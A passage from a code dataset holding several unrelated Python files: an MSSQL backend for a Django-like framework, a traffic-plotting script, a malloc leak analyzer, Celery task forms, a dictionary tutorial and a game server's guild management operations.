%s',\n 'gte': '>= %s',\n 'lt': '< %s',\n 'lte': '<= %s',\n 'startswith': 'LIKE %s',\n 'endswith': 'LIKE %s',\n 'istartswith': 'LIKE UPPER(%s)',\n 'iendswith': 'LIKE UPPER(%s)',\n }\n\n # The patterns below are used to generate SQL pattern lookup clauses when\n # the right-hand side of the lookup isn't a raw string (it might be an expression\n # or the result of a bilateral transformation).\n # In those cases, special characters for LIKE operators (e.g. \\, *, _) should be\n # escaped on database side.\n #\n # Note: we use str.format() here for readability as '%' is used as a wildcard for\n # the LIKE operator.\n pattern_esc = r\"REPLACE(REPLACE(REPLACE({}, '\\', '\\\\'), '%%', '\\%%'), '_', '\\_')\"\n pattern_ops = {\n 'contains': r\"LIKE '%%' || {} || '%%' ESCAPE '\\'\",\n 'icontains': r\"LIKE '%%' || UPPER({}) || '%%' ESCAPE '\\'\",\n 'startswith': r\"LIKE {} || '%%' ESCAPE '\\'\",\n 'istartswith': r\"LIKE UPPER({}) || '%%' ESCAPE '\\'\",\n 'endswith': r\"LIKE '%%' || {} ESCAPE '\\'\",\n 'iendswith': r\"LIKE '%%' || UPPER({}) ESCAPE '\\'\",\n }\n\n Database = Database\n SchemaEditorClass = DatabaseSchemaEditor\n # Classes instantiated in __init__().\n client_class = DatabaseClient\n creation_class = DatabaseCreation\n features_class = DatabaseFeatures\n introspection_class = DatabaseIntrospection\n ops_class = DatabaseOperations\n\n def get_new_connection(self, conn_params):\n options = self.settings_dict['OPTIONS']\n if options.get('driver') == 'pytds':\n import pytds\n connection = pytds.connect(\n server=conn_params['server'], database=conn_params['database'], port=conn_params['port'],\n user=conn_params['user'], password=conn_params['password'], timeout=1000, login_timeout=100,\n )\n else:\n connection = Database.connect(**conn_params)\n\n # self.isolation_level must be set:\n # - after connecting to the database in order to obtain the database's\n # default when no value is explicitly specified in options.\n # - before calling _set_autocommit() because if autocommit is on, that\n # will set connection.isolation_level to ISOLATION_LEVEL_AUTOCOMMIT.\n options = self.settings_dict['OPTIONS']\n try:\n self.isolation_level = options['isolation_level']\n except KeyError:\n self.isolation_level = 'READ COMMITED'\n else:\n pass\n # Set the isolation level to the value from OPTIONS.\n # if self.isolation_level != connection.isolation_level:\n # connection.set_session(isolation_level=self.isolation_level)\n\n return connection\n\n def get_connection_params(self):\n settings_dict = self.settings_dict\n if settings_dict['NAME'] == '':\n raise ImproperlyConfigured(\n \"settings.DATABASES is improperly configured. \"\n \"Please supply the NAME value.\")\n kwargs = {\n 'database': settings_dict['NAME'] or 'master',\n 'server': settings_dict['HOST'],\n 'port': settings_dict['PORT'],\n 'user': settings_dict['USER'],\n 'password': settings_dict['PASSWORD'],\n **settings_dict['OPTIONS'],\n }\n return kwargs\n\n def _set_autocommit(self, autocommit):\n with self.wrap_database_errors:\n self.connection.autocommit = autocommit\n\n def init_connection_state(self):\n pass\n\n def create_cursor(self, name=None):\n return self.connection.cursor()\n\n def make_cursor(self, cursor):\n \"\"\"Create a cursor without debug logging.\"\"\"\n if self.settings_dict['OPTIONS']['driver'] == 'pytds':\n return super().make_cursor(cursor)\n return CursorWrapper(cursor, self)\n\n def make_debug_cursor(self, cursor):\n if self.settings_dict['OPTIONS']['driver'] == 'pytds':\n return super().make_debug_cursor(cursor)\n return CursorDebugWrapper(cursor, self)\n\n def is_usable(self):\n try:\n self.connection.cursor().execute(\"SELECT 1\")\n except Database.Error:\n return False\n else:\n return True\n\n def call(self, proc_name: str, args = None):\n with self.cursor() as cur:\n stmt = f'EXEC {proc_name}'\n if args:\n stmt += ' ' + ','.join(['?' for arg in args])\n cur.execute(stmt, args)\n return cur\n\n\nclass CursorWrapper(orun.db.backends.utils.CursorWrapper):\n def execute(self, sql, params=None):\n return super().execute(sql.replace('%s', '?'), params)\n\n def executemany(self, sql, param_list):\n return super().executemany(sql.replace('%s', '?'), param_list)\n\n def _execute(self, sql, params, *ignored_wrapper_args):\n return super()._execute(sql.replace('%s', '?'), params, *ignored_wrapper_args)\n\n def _execute_with_wrappers(self, sql, params, many, executor):\n return super()._execute_with_wrappers(sql.replace('%s', '?'), params, many, executor)\n\n def close(self):\n pass\n\n\nclass CursorDebugWrapper(CursorWrapper):\n\n # XXX callproc isn't instrumented at this time.\n\n def execute(self, sql, params=None):\n start = time()\n try:\n return super().execute(sql, params)\n finally:\n stop = time()\n duration = stop - start\n sql = self.db.ops.last_executed_query(self.cursor, sql, params)\n self.db.queries_log.append({\n 'sql': sql,\n 'time': \"%.3f\" % duration,\n })\n logger.debug(\n '(%.3f) %s; args=%s', duration, sql, params,\n extra={'duration': duration, 'sql': sql, 'params': params}\n )\n\n def executemany(self, sql, param_list):\n start = time()\n try:\n return super().executemany(sql, param_list)\n finally:\n stop = time()\n duration = stop - start\n try:\n times = len(param_list)\n except TypeError: # param_list could be an iterator\n times = '?'\n self.db.queries_log.append({\n 'sql': '%s times: %s' % (times, sql),\n 'time': \"%.3f\" % duration,\n })\n logger.debug(\n '(%.3f) %s; args=%s', duration, sql, param_list,\n extra={'duration': duration, 'sql': sql, 'params': param_list}\n )\n","repo_name":"katrid/orun","sub_path":"orun/db/backends/mssql/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":8542,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"2"} +{"seq_id":"1174613005","text":"import datetime\n\nimport matplotlib.dates as mdates\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\ndf = pd.read_table(\"hits_by_second.txt\", sep=\",\")\ndf.columns = [\"ts\", \"hits\"]\ndf[\"valid\"] = pd.to_datetime(df[\"ts\"], format=\"%Y%m%d%H%M%S\")\n\n(fig, ax) = plt.subplots(1, 1)\n\nax.bar(\n df[\"valid\"].values, df[\"hits\"].values, width=1 / 86400.0, ec=\"b\", fc=\"b\"\n)\nax.grid(True)\nax.set_xlim(\n datetime.datetime(2016, 11, 2, 22, 15),\n datetime.datetime(2016, 11, 2, 23, 15),\n)\nax.xaxis.set_major_formatter(mdates.DateFormatter(\"%-I:%M\"))\nax.set_xlabel(\"Evening of 2 Nov 2016, CDT\")\nax.set_ylabel(\"Website Requests per Second\")\n\nax.annotate(\n \"10:23 PM\\nRain Starts\",\n xy=(datetime.datetime(2016, 11, 2, 22, 23), 20000.0),\n xycoords=\"data\",\n xytext=(-50, 30),\n textcoords=\"offset points\",\n bbox=dict(boxstyle=\"round\", fc=\"0.8\"),\n arrowprops=dict(\n arrowstyle=\"->\", connectionstyle=\"angle,angleA=0,angleB=90,rad=1\"\n ),\n)\nax.annotate(\n \"10:54 PM\\nTarp is Rolled Out!\",\n xy=(datetime.datetime(2016, 11, 2, 22, 54), 20000.0),\n xycoords=\"data\",\n xytext=(-50, 30),\n textcoords=\"offset points\",\n bbox=dict(boxstyle=\"round\", fc=\"0.8\"),\n arrowprops=dict(\n arrowstyle=\"->\", connectionstyle=\"angle,angleA=0,angleB=90,rad=1\"\n ),\n)\n\nax.set_title(\"IEM WebFarm Traffic During 2016 Cubs+Indians Game 7\")\n\nfig.savefig(\"test.png\")\n","repo_name":"akrherz/DEV","sub_path":"matplotlib/website_hits.py","file_name":"website_hits.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"28503864458","text":"import io\nimport re\nimport sys\nimport collections\n\nallocations = {}\n\nAllocation = collections.namedtuple('Allocation', ['line', 'lineno', 'size'])\n\ninfile = io.TextIOWrapper(sys.stdin.buffer, encoding='latin-1')\n\nfor n, line in enumerate(infile.readlines()):\n # Make lines 1-based instead of 0-based\n n += 1\n\n match = re.match(r\"^malloc\\(([0-9]+)\\) = (0x[0-9A-F]+)$\", line)\n if match:\n allocations[match.group(2)] = Allocation(line = line, lineno = n, size = int(match.group(1)))\n continue\n\n match = re.match(r\"^realloc\\((0x[0-9A-F]+), ([0-9]+)\\) = (0x[0-9A-F]+)$\", line)\n if match:\n if match.group(1) != '0x0':\n try:\n allocations.pop(match.group(1))\n except KeyError:\n sys.stdout.write(\"{:3d}: {}\".format(n, line))\n sys.stdout.write(\">> {} not allocated\\n\".format(match.group(1)))\n continue\n\n allocations[match.group(3)] = Allocation(line = line, lineno = n, size = int(match.group(2)))\n continue\n\n match = re.match(r\"^free\\((0x[0-9A-F]+)\\)$\", line)\n if match:\n if (match.group(1) == '0x0'):\n continue\n try:\n allocations.pop(match.group(1))\n except KeyError:\n sys.stdout.write(\"{:3d}: {}\".format(n, line))\n sys.stdout.write(\">> {} not allocated\\n\".format(match.group(1)))\n continue\n\n continue\n\nfor addr, alloc in allocations.items():\n sys.stdout.write(\"{:3d}: {}\".format(alloc.lineno, alloc.line))\n sys.stdout.write(\">> {} never freed\\n\".format(addr))\n","repo_name":"matthijskooijman/scripts","sub_path":"embedded/memdebug/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"2"} +{"seq_id":"5825628379","text":"#coding=utf-8\r\nfrom __future__ import absolute_import, unicode_literals\r\n\r\nfrom django import forms\r\nfrom django.conf import settings\r\nfrom django.contrib import admin\r\nfrom django.forms.widgets import Select\r\nfrom django.template.defaultfilters import pluralize\r\nfrom django.utils.translation import ugettext_lazy as _\r\nfrom GOD import models\r\nfrom django.forms import fields as celery_fileds\r\n# from django.forms import forms\r\n\r\n\r\nfrom celery import current_app\r\nfrom celery.utils import cached_property\r\nfrom kombu.utils.json import loads\r\n\r\nfrom django_celery_beat.models import (\r\n PeriodicTask, PeriodicTasks,\r\n IntervalSchedule, CrontabSchedule,\r\n SolarSchedule\r\n)\r\nfrom django_celery_beat.utils import is_database_scheduler\r\n\r\nclass TaskSelectWidget(Select):\r\n \"\"\"Widget that lets you choose between task names.\"\"\"\r\n\r\n celery_app = current_app\r\n _choices = None\r\n\r\n def tasks_as_choices(self):\r\n _ = self._modules # noqa\r\n tasks = list(sorted(name for name in self.celery_app.tasks\r\n if not name.startswith('celery.')))\r\n return (('', ''), ) + tuple(zip(tasks, tasks))\r\n\r\n @property\r\n def choices(self):\r\n if self._choices is None:\r\n self._choices = self.tasks_as_choices()\r\n return self._choices\r\n\r\n @choices.setter\r\n def choices(self, _):\r\n # ChoiceField.__init__ sets ``self.choices = choices``\r\n # which would override ours.\r\n pass\r\n\r\n @cached_property\r\n def _modules(self):\r\n self.celery_app.loader.import_default_modules()\r\nclass TaskChoiceField(forms.ChoiceField):\r\n \"\"\"Field that lets you choose between task names.\"\"\"\r\n\r\n widget = TaskSelectWidget\r\n\r\n def valid_value(self, value):\r\n return True\r\nclass PeriodicTaskForm(forms.ModelForm):\r\n email_subject=celery_fileds.CharField()\r\n email_to=celery_fileds.EmailField()\r\n # email_from=celery_fileds.EmailField()\r\n email_content=celery_fileds.CharField()\r\n \"\"\"Form that lets you create and modify periodic tasks.\"\"\"\r\n def __new__(cls, *args, **kwargs):\r\n for field_name,field_obj in cls.base_fields.items():\r\n\r\n #判断是否字段在 只读字段中\r\n field_obj.widget.attrs['class'] = 'form-control'\r\n\r\n\r\n return forms.ModelForm.__new__(cls)\r\n # def __init__(self,*args,**kwargs):\r\n # super(PeriodicTaskForm,self).__init__(*args,**kwargs)\r\n\r\n # self.fields[\"regtask\"].choices=TaskSelectWidget.choices\r\n regtask = TaskChoiceField(\r\n label=_('Task (registered)'),\r\n required=False,\r\n )\r\n\r\n task = forms.CharField(\r\n label=_('Task (custom)'),\r\n required=False,\r\n max_length=200,\r\n )\r\n\r\n class Meta:\r\n \"\"\"Form metadata.\"\"\"\r\n\r\n model = PeriodicTask\r\n exclude = (\"interval\",\"solar\",\"kwargs\",\"queue\",\r\n \"exchange\",\r\n \"routing_key\",\r\n \"total_run_count\",\r\n \"args\",\r\n\r\n\r\n\r\n )\r\n\r\n def clean(self):\r\n data = super(PeriodicTaskForm, self).clean()\r\n regtask = data.get('regtask')\r\n if regtask:\r\n data['task'] = regtask\r\n if not data['task']:\r\n exc = forms.ValidationError(_('Need name of task'))\r\n self._errors['task'] = self.error_class(exc.messages)\r\n raise exc\r\n return data\r\n\r\n def _clean_json(self, field):\r\n value = self.cleaned_data[field]\r\n try:\r\n loads(value)\r\n except ValueError as exc:\r\n raise forms.ValidationError(\r\n _('Unable to parse JSON: %s') % exc,\r\n )\r\n return value\r\n\r\n def clean_args(self):\r\n return self._clean_json('args')\r\n\r\n def clean_kwargs(self):\r\n return self._clean_json('kwargs')\r\n\r\n\r\n\r\n\r\n #上为celerymodelform\r\n\r\n #------------------------------------------------------\r\n\r\nclass TaskPlanForm(forms.ModelForm):\r\n class Meta:\r\n model=models.TaskPlan\r\n fields=\"__all__\"\r\n labels={\r\n \"name\":\"计划名称\",\r\n }\r\n\r\n\r\nclass TaskStageForm(forms.ModelForm):\r\n class Meta:\r\n model=models.TaskStage\r\n fields=\"__all__\"\r\n\r\n def __init__(self, *args, **kwargs):\r\n super(TaskStageForm, self).__init__(*args, **kwargs)\r\n print(self.fields)\r\n self.fields['taskplan_id'].choices = models.TaskPlan.objects.values_list(\"name\")\r\n # labels={\r\n # \"name\":\"计划名称\",\r\n # }\r\n\r\nclass TaskJobForm(forms.ModelForm):\r\n class Meta:\r\n model=models.TaskJob\r\n fields=\"__all__\"\r\n\r\nclass SSHTASKForm(forms.ModelForm):\r\n class Meta:\r\n model=models.SSHTASK\r\n fields=\"__all__\"\r\n\r\nclass PIPtaskForm(forms.ModelForm):\r\n class Meta:\r\n model=models.PIPtask\r\n fields=\"__all__\"\r\n\r\nclass GITTASKForm(forms.ModelForm):\r\n class Meta:\r\n model=models.GITTASK\r\n fields=\"__all__\"","repo_name":"kaiven11/GODEYE","sub_path":"GOD/froms.py","file_name":"froms.py","file_ext":"py","file_size_in_byte":4988,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"20708720587","text":"#Dictionaries, they are defined by key : value pairs\n\nstudent = {'name':'Erastus','Adm':'ci/00030/017'}\nprint(student['Adm'])\n\n# working with dictionaries\n\nstudent = {'name':'Erastus','Adm':'ci/00030/017'}\n\n# adding new values to dictionaries\n\nstudent['age'] = 22\nstudent['nationality'] = 'kenyan'\n\nprint(student)\n\n# modyfying values in dictionaries\n\nrobot = {'vector_1': 9,\"vector_2\":8,'speed':'medium'}\n\nif robot['speed'] == \"slow\":\n vector_change = 3\nelif robot['speed'] == \"medium\" :\n vector_change = 10\nelse:\n vector_change = 6\n\nrobot['vector_1'] = robot['vector_1'] - vector_change\nprint(robot)\n\nprint(f\"this is the new vector postion for vector 1, {robot['vector_1']}\")\n\n# removing key value pairs, we use the del function followed by dic'name and key\n\ndel robot['vector_2']\n\nprint(robot)\n \n\n# using get() to access specific values\n# get function can be used to pass two arguments i.e when a key doesnt exist in a dictionary, it passes the second argument\n\nrobot_2 = robot.get('vector_1',\"vector 2 may not exist\")\nprint(robot_2)\n\n# Looping through dictionaries\n# method 1\n\nnames = {'Erastus':'Andedo',\n'Tonny':'Blair',\n'Sydney':'Andedo',\n'Emmanuel':'Andedo',\n}\n\nfor fname,lname in names.items():\n print(f\"first name:{fname}\")\n print(f\"last name :{lname}\")\n\n\n# method 2 using the key() method\n\nnames = {'Erastus':'Andedo',\n'Tonny':'Blair',\n'Sydney':'Andedo',\n'Emmanuel':'Andedo',\n}\n\nfor name in names.keys():\n print(f\"first name is:{name.upper()}\")\n\nfor name in names.values():\n print(name.upper())\n\n#monday session working with dictionaries and looping in a particular order\n\nnames = {'Erastus':'Andedo',\n'Tonny':'Blair',\n'Sydney':'Andedo',\n'Emmanuel':'Andedo',\n}\n \nfor person in sorted(names.keys()):\n print(person)\n\nfor person in set(names.values()):\n print(person.upper())\n\n\n\n\n\n\n\n\n\n\n","repo_name":"everlearner-bee/RAS","sub_path":"dictionaries.py","file_name":"dictionaries.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"8190431591","text":"from direct.directnotify import DirectNotifyGlobal\nfrom direct.distributed.DistributedObjectGlobalUD import DistributedObjectGlobalUD\nfrom direct.fsm.FSM import FSM\nfrom otp.otpbase import OTPUtils, OTPGlobals\nfrom otp.uberdog.RejectCode import RejectCode\nimport time\n\nGUILDRANK_VETERAN = 4\nGUILDRANK_GM = 3\nGUILDRANK_OFFICER = 2\nGUILDRANK_MEMBER = 1\n\nclass OperationFSM(FSM):\n DELAY = 0.25\n\n def __init__(self, mgr, sender, target=None):\n FSM.__init__(self, 'OperationFSM-%s' % sender)\n self.mgr = mgr\n self.air = mgr.air\n self.sender = sender\n self.target = target\n self.deleted = False\n \n if self.DELAY:\n self.mgr.operations[self.sender] = self\n \n def fsmName(self, name):\n return 'OperationFSM-%s-%s' % (id(self), name)\n \n def deleteOperation(self):\n if not self.deleted:\n if self.DELAY:\n taskMgr.doMethodLater(self.DELAY, self.__deleteOperation, self.fsmName('deleteOperation'))\n \n self.deleted = True\n \n def __deleteOperation(self, task):\n if self.sender in self.mgr.operations:\n del self.mgr.operations[self.sender]\n\n def enterOff(self):\n self.deleteOperation()\n \n def enterError(self, message=None):\n self.mgr.notify.warning(\"An error has occurred in a '%s'. Message: %s\" % (self.__class__.__name__, message))\n self.deleteOperation()\n\nclass RetrievePirateOperation(OperationFSM):\n \n def enterStart(self):\n self.air.dbInterface.queryObject(self.air.dbId, self.sender, self.__retrievedPirate)\n \n def __retrievedPirate(self, dclass, fields):\n if dclass != self.air.dclassesByName['DistributedPlayerPirateUD']:\n self.demand('Error', 'Sender is not a pirate.')\n return\n\n self.pirate = fields\n self.demand('RetrievedPirate')\n \n def enterRetrievedPirate(self):\n pass\n\nclass RetrievePirateGuildOperation(RetrievePirateOperation):\n\n def enterRetrievedPirate(self):\n self.guildId = self.pirate.get('setGuildId', [0])[0]\n \n if not self.guildId:\n self.demand('Off')\n return\n \n self.air.dbInterface.queryObject(self.air.dbId, self.guildId, self.__retrievedGuild)\n \n def __retrievedGuild(self, dclass, fields):\n if dclass != self.air.dclassesByName['DistributedGuildUD']:\n self.demand('Error', 'Guild ID is not linked to a guild.')\n return\n\n self.guild = fields\n self.members = [list(member) for member in fields['setMembers'][0]]\n self.mgr.addMemberList(self.guildId, self.members)\n self.demand('RetrievedGuild')\n \n def enterRetrievedGuild(self):\n pass\n \n def getMember(self, avId):\n for i, member in enumerate(self.members):\n if member[0] == avId:\n return i, member\n \n return 0, None\n \n def isMember(self, avId):\n for i, member in enumerate(self.members):\n if member[0] == avId:\n return True\n \n return False\n \n def updateMembers(self, members):\n self.mgr.addMemberList(self.guildId, members)\n self.air.dbInterface.updateObject(self.air.dbId, self.guildId, self.air.dclassesByName['DistributedGuildUD'], {'setMembers': [members]})\n \n def convertMember(self, member):\n avId, rank, name, _, _ = member\n online = avId in self.air.piratesFriendsManager.onlinePirates\n bandManagerId = 0\n bandId = 0\n \n return [avId, name, rank, online, bandManagerId, bandId]\n\nclass UpdatePirateExtension(object):\n\n def enterUpdatePirate(self, avatar, guildId, guildName, rank):\n dclass = self.air.dclassesByName['DistributedPlayerPirateUD']\n \n self.air.send(dclass.aiFormatUpdate('setGuildId', avatar, avatar, self.air.ourChannel, [guildId]))\n self.air.send(dclass.aiFormatUpdate('setGuildName', avatar, avatar, self.air.ourChannel, [guildName]))\n self.mgr.d_guildStatusUpdate(avatar, guildId, guildName, rank)\n self.demand('Off')\n\nclass CreateGuildOperation(RetrievePirateOperation, UpdatePirateExtension):\n name = 'Pirate Guild'\n rank = GUILDRANK_GM\n\n def enterRetrievedPirate(self):\n guildId = self.pirate.get('setGuildId', [0])[0]\n\n if guildId:\n self.demand('Off')\n return\n \n gold = self.pirate['setGoldInPocket'][0]\n \n if gold < OTPGlobals.GUILD_COST:\n self.demand('Off')\n return\n\n dclass = self.air.dclassesByName['DistributedPlayerPirateUD']\n self.air.send(dclass.aiFormatUpdate('setGoldInPocket', self.sender, self.sender, self.air.ourChannel, [gold - OTPGlobals.GUILD_COST]))\n\n name = self.pirate['setName'][0]\n fields = {\n 'setName': [self.name],\n 'setWishName': [''],\n 'setOldName': [''],\n 'setMembers': [[[self.sender, GUILDRANK_GM, name, 0, 0]]]\n }\n self.air.dbInterface.createObject(self.air.dbId, self.air.dclassesByName['DistributedGuildUD'], fields, self.__createdGuild)\n \n def __createdGuild(self, doId):\n if not doId:\n self.demand('Error', \"Couldn't create guild object on the database.\")\n return\n\n self.demand('UpdatePirate', self.sender, doId, self.name, GUILDRANK_GM)\n\nclass PirateOnlineOperation(RetrievePirateGuildOperation, UpdatePirateExtension):\n DELAY = 0.0\n \n def enterRetrievedGuild(self):\n self.guildName = self.guild['setName'][0]\n pirateName = self.pirate['setName'][0]\n i, self.member = self.getMember(self.sender)\n \n if not self.member:\n self.demand('Off')\n return\n\n if self.member[2] != pirateName:\n self.member[2] = pirateName\n self.members[i] = self.member\n self.updateMembers(self.members)\n\n memberList = self.mgr.getMemberIds(self.guildId)\n self.mgr.d_recvAvatarOnline(memberList, self.sender, pirateName)\n self.demand('CheckName')\n \n def enterCheckName(self):\n if not self.guild['setWishName'][0]:\n self.demand('Finish')\n return\n \n self.wishName = self.guild['setWishName'][0]\n self.mgr.air.csm.accountDB.getGuildNameStatus(self.wishName, self.__gotGuildNameStatus, 'Check')\n\n def __gotGuildNameStatus(self, status):\n if status == 0:\n self.demand('Finish')\n return\n \n memberList = self.mgr.getMemberIds(self.guildId)\n \n if not memberList:\n self.demand('Finish')\n return\n\n if status == 1:\n self.air.dbInterface.updateObject(self.air.dbId, self.guildId, self.air.dclassesByName['DistributedGuildUD'], {'setWishName': ['']})\n self.mgr.d_guildNameChange(memberList, self.wishName, status)\n self.demand('Finish')\n return\n\n oldName = self.guildName\n self.guildName = self.wishName\n self.air.dbInterface.updateObject(self.air.dbId, self.guildId, self.air.dclassesByName['DistributedGuildUD'], {'setWishName': [''], 'setName': [self.wishName]})\n self.mgr.d_guildNameChange(memberList, self.wishName, status)\n \n dclass = self.air.dclassesByName['DistributedPlayerPirateUD']\n \n for memberId in memberList:\n i, member = self.getMember(memberId)\n\n self.air.send(dclass.aiFormatUpdate('setGuildName', memberId, memberId, self.air.ourChannel, [self.guildName]))\n self.mgr.d_guildStatusUpdate(memberId, self.guildId, self.guildName, member[1])\n \n if oldName != 'Pirate Guild':\n self.demand('RemoveName', oldName)\n else:\n self.demand('Off')\n \n def enterRemoveName(self, guildName):\n self.mgr.air.csm.accountDB.getGuildNameStatus(guildName, lambda status: None, 'Remove')\n self.demand('Off')\n \n def enterFinish(self):\n self.demand('UpdatePirate', self.sender, self.guildId, self.guildName, self.member[1])\n\nclass PirateOfflineOperation(RetrievePirateOperation):\n DELAY = 0.0\n\n def enterRetrievedPirate(self):\n guildId = self.pirate.get('setGuildId', [0])[0]\n \n if not guildId:\n self.demand('Off')\n return\n \n memberList = self.mgr.getMemberIds(guildId)\n \n if not memberList:\n self.demand('Off')\n return\n \n self.mgr.d_recvAvatarOffline(memberList, self.sender, self.pirate['setName'][0])\n self.demand('Off')\n\nclass RemoveMemberOperation(RetrievePirateGuildOperation, UpdatePirateExtension):\n \n def enterRetrievedGuild(self):\n memberList = self.mgr.getMemberIds(self.guildId)\n i, senderMember = self.getMember(self.sender)\n \n if not senderMember:\n self.demand('Off')\n return\n\n j, targetMember = self.getMember(self.target)\n \n if not targetMember:\n self.demand('Off')\n return\n\n senderRank = senderMember[1]\n targetRank = targetMember[1]\n selfKick = self.sender == self.target\n \n if not selfKick and senderRank not in (GUILDRANK_OFFICER, GUILDRANK_GM):\n self.demand('Off')\n return\n \n if targetRank == GUILDRANK_GM and len(self.members) > 1:\n self.demand('Off')\n return\n \n if senderRank == GUILDRANK_OFFICER and not selfKick:\n senderTime = senderMember[3]\n senderKickNum = senderMember[4]\n currentTime = int(time.time())\n \n if senderTime != 0 and senderTime > currentTime and senderKickNum == 5:\n self.mgr.d_notifyGuildKicksMaxed(self.sender)\n self.demand('Off')\n return\n \n if senderTime == 0 or senderTime <= currentTime:\n senderMember[3] = currentTime + 86400 # One day\n senderMember[4] = 1\n else:\n senderMember[4] += 1\n\n self.members[i] = senderMember\n\n guildName = self.guild['setName'][0]\n name = targetMember[2]\n\n del self.members[j]\n self.updateMembers(self.members)\n self.mgr.d_recvMemberRemoved(memberList, self.target, self.sender, name, senderMember[2])\n \n if len(self.members) == 0 and guildName != 'Pirate Guild':\n self.demand('RemoveName', guildName)\n else:\n self.demand('Finish')\n \n def enterRemoveName(self, guildName):\n self.mgr.air.csm.accountDB.getGuildNameStatus(guildName, lambda status: None, 'Remove')\n self.demand('Finish')\n \n def enterFinish(self):\n self.demand('UpdatePirate', self.target, 0, '', 0)\n\nclass MemberListOperation(RetrievePirateGuildOperation):\n DELAY = 1.5\n \n def enterRetrievedGuild(self):\n memberInfo = [self.convertMember(member) for member in self.members]\n self.mgr.d_receiveMembers(self.sender, memberInfo)\n self.demand('Off')\n\nclass RequestInviteOperation(RetrievePirateGuildOperation):\n DELAY = 1.5\n \n def enterRetrievedGuild(self):\n if self.isMember(self.target):\n self.mgr.d_guildRejectInvite(self.sender, RejectCode.ALREADY_IN_GUILD)\n self.demand('Off')\n return\n \n _, member = self.getMember(self.sender)\n \n if (not member) or member[1] == GUILDRANK_MEMBER:\n self.demand('Off')\n return\n\n self.air.dbInterface.queryObject(self.air.dbId, self.target, self.__retrievedPirate)\n \n def __retrievedPirate(self, dclass, fields):\n if dclass != self.air.dclassesByName['DistributedPlayerPirateUD']:\n self.demand('Error', 'Sender is not a pirate.')\n return\n\n if fields.get('setGuildId', [0])[0]:\n self.mgr.d_guildRejectInvite(self.sender, RejectCode.ALREADY_IN_GUILD)\n self.demand('Off')\n return\n \n self.mgr.addInvitation(self.sender, self.target, self.pirate['setName'][0], self.guildId, self.guild['setName'][0])\n self.demand('Off')\n\nclass AddMemberOperation(RetrievePirateGuildOperation, UpdatePirateExtension):\n DELAY = 1.5\n \n def enterRetrievedGuild(self):\n if self.isMember(self.target):\n self.mgr.d_guildRejectInvite(self.sender, RejectCode.ALREADY_IN_GUILD)\n self.demand('Off')\n return\n \n self.air.dbInterface.queryObject(self.air.dbId, self.target, self.__retrievedPirate)\n \n def __retrievedPirate(self, dclass, fields):\n if dclass != self.air.dclassesByName['DistributedPlayerPirateUD']:\n self.demand('Error', 'Target is not a pirate.')\n return\n\n if fields.get('setGuildId', [0])[0]:\n self.mgr.d_guildRejectInvite(self.sender, RejectCode.ALREADY_IN_GUILD)\n self.demand('Off')\n return\n \n i, senderMember = self.getMember(self.sender)\n \n if not senderMember:\n self.demand('Off')\n return\n\n name = fields['setName'][0]\n member = [self.target, GUILDRANK_MEMBER, name, 0, 0]\n\n self.members.append(member)\n self.updateMembers(self.members)\n self.demand('UpdatePirate', self.target, self.guildId, self.guild['setName'][0], GUILDRANK_MEMBER)\n self.mgr.d_recvMemberAdded(self.mgr.getMemberIds(self.guildId), self.convertMember(member), self.sender, senderMember[2])\n\nclass SendChatOperation(RetrievePirateOperation):\n DELAY = 0.5\n\n def __init__(self, mgr, sender, callback, extraArgs):\n RetrievePirateOperation.__init__(self, mgr, sender)\n self.callback = callback\n self.extraArgs = extraArgs\n \n def enterRetrievedPirate(self):\n guildId = self.pirate.get('setGuildId', [0])[0]\n \n if not guildId:\n self.demand('Off')\n return\n\n memberList = self.mgr.getMemberIds(guildId)\n \n if not memberList:\n self.demand('Off')\n return\n \n self.extraArgs.insert(1, self.pirate['setName'][0])\n self.callback(memberList, *self.extraArgs)\n self.demand('Off')\n\nclass ChangeRankOperation(RetrievePirateGuildOperation):\n\n def __init__(self, mgr, sender, target, rank):\n RetrievePirateGuildOperation.__init__(self, mgr, sender, target)\n self.rank = rank\n\n def enterRetrievedGuild(self):\n guildName = self.guild['setName'][0]\n memberList = self.mgr.getMemberIds(self.guildId)\n i, senderMember = self.getMember(self.sender)\n \n if not senderMember:\n self.demand('Off')\n return\n \n senderRank = senderMember[1]\n \n if senderRank != GUILDRANK_GM:\n self.demand('Off')\n return\n\n j, targetMember = self.getMember(self.target)\n \n if not targetMember:\n self.demand('Off')\n return\n \n targetRank = targetMember[1]\n \n if self.rank == targetRank:\n self.demand('Off')\n return\n\n senderName = senderMember[2]\n avatarName = targetMember[2]\n \n if self.rank == GUILDRANK_GM:\n promote = True\n elif self.rank == GUILDRANK_VETERAN and targetRank == GUILDRANK_MEMBER:\n promote = True\n elif self.rank == GUILDRANK_OFFICER and targetRank in (GUILDRANK_MEMBER, GUILDRANK_VETERAN):\n promote = True\n else:\n promote = False\n\n self.members[j][1] = self.rank\n self.mgr.d_guildStatusUpdate(self.target, self.guildId, guildName, self.rank)\n self.mgr.d_recvMemberUpdateRank(memberList, self.target, self.sender, avatarName, senderName, self.rank, promote)\n \n if self.rank == GUILDRANK_GM:\n self.members[i][1] = GUILDRANK_OFFICER\n self.mgr.d_guildStatusUpdate(self.sender, self.guildId, guildName, GUILDRANK_OFFICER)\n self.mgr.d_recvMemberUpdateRank(memberList, self.sender, self.target, senderName, avatarName, GUILDRANK_OFFICER, False)\n \n self.updateMembers(self.members)\n self.demand('Off')\n\nclass SendNameOperation(RetrievePirateGuildOperation):\n\n def __init__(self, mgr, sender, name):\n RetrievePirateGuildOperation.__init__(self, mgr, sender)\n self.name = name\n \n def enterRetrievedGuild(self):\n i, member = self.getMember(self.sender)\n \n if (not member) or member[1] != GUILDRANK_GM:\n self.mgr.d_recvNameRequest([self.sender], 0)\n self.demand('Off')\n return\n \n if self.guild['setWishName'][0]:\n self.mgr.d_recvNameRequest([self.sender], 1)\n self.demand('Off')\n return\n \n self.mgr.air.csm.accountDB.getGuildNameStatus(self.name, self.__gotGuildNameStatus, 'New')\n 